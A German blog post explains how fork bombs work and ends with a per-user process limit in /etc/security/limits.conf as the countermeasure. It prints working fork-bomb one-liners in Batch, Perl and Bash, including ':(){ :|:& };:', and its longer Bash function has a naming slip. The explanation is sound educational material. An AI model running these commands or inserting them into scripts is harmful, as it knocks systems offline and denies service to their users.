Forkbomb

0
482

Unter einer “Forkbomb” versteht man ein Programm, welches sich rekursiv selbst kopiert bzw. sich selbst erneut aufruft.
In Unix bspw. funktioniert das unter anderem durch den Systemcall “fork” in Endlosschleife.

Hierbei entstehen in sehr kurzer Zeit enorm viele Prozesse, da die Vermehrung exponentiell vonstattengeht.
Jede Kopie ruft immer weitere Kopien hervor.[2, 4, 8, 16 usw.]
Nach zehn Zyklen existieren 1024 Prozesse, nach zwanzig Zyklen sind es bereits 1.048.576.
Demnach ist arbeiten nach kürzester Zeit nicht mehr möglich.

In einer Windows-Batch funktioniert dies bspw wie folgt:
@echo off
:start
start “Forkbomb” /high %0
goto start

Oder in der Kurzform:

%0|%0

Plattformunabhängig in Perl:

perl -e “fork while fork”

In Bash:

function forkbomb() { #Deklaration der Funktion “forkbomb”
forkbomb | forkbomb& #Rekursiver Aufruf der Funktion
}
f #Aufruf der Funktion

Stark verkürzt:

:(){ :|:& };:

Hierbei wird die Funktion ‘:’ deklariert, die zwei Kopien von sich selbst aufruft ‘:|:’ und diese im Hintergrund ausführt ‘&’.
Diese wird nach dem Kommandoseparator ‘;’ aufgerufen.

Gegenmaßnahme in den meisten Linux-Distributionen:

Man kann einer Obergrenze für die Anzahl ausgeführter Prozesse pro Benutzer festlegen in der:

/etc/security/limits.conf

Diese ist wie folgt aufgebaut:

# /etc/security/limits.conf
#
#Each line describes a limit for a user in the form:
#
#
#
#Where:
# can be:
# – a user name
# – a group name, with @group syntax
# – the wildcard *, for default entry
# – the wildcard %, can be also used with %group syntax,
# for maxlogin limit
# – NOTE: group and wildcard limits are not applied to root.
# To apply a limit to the root user, must be
# the literal username root.
#
# can have the two values:
# – “soft” for enforcing the soft limits
# – “hard” for enforcing hard limits
#
# can be one of the following:
# – core – limits the core file size (KB)
# – data – max data size (KB)
# – fsize – maximum filesize (KB)
# – memlock – max locked-in-memory address space (KB)
# – nofile – max number of open files
# – rss – max resident set size (KB)
# – stack – max stack size (KB)
# – cpu – max CPU time (MIN)
# – nproc – max number of processes
# – as – address space limit (KB)
# – maxlogins – max number of logins for this user
# – maxsyslogins – max number of logins on the system
# – priority – the priority to run user process with
# – locks – max number of file locks the user can hold
# – sigpending – max number of pending signals
# – msgqueue – max memory used by POSIX message queues (bytes)
# – nice – max nice priority allowed to raise to values: [-20, 19]
# – rtprio – max realtime priority
# – chroot – change root to directory (Debian-specific)
#
#
#

#* soft core 0
#root hard core 100000

HINTERLASSEN SIE EINE ANTWORT

Bitte geben Sie Ihren Kommentar ein
Bitte geben Sie Ihren Namen ein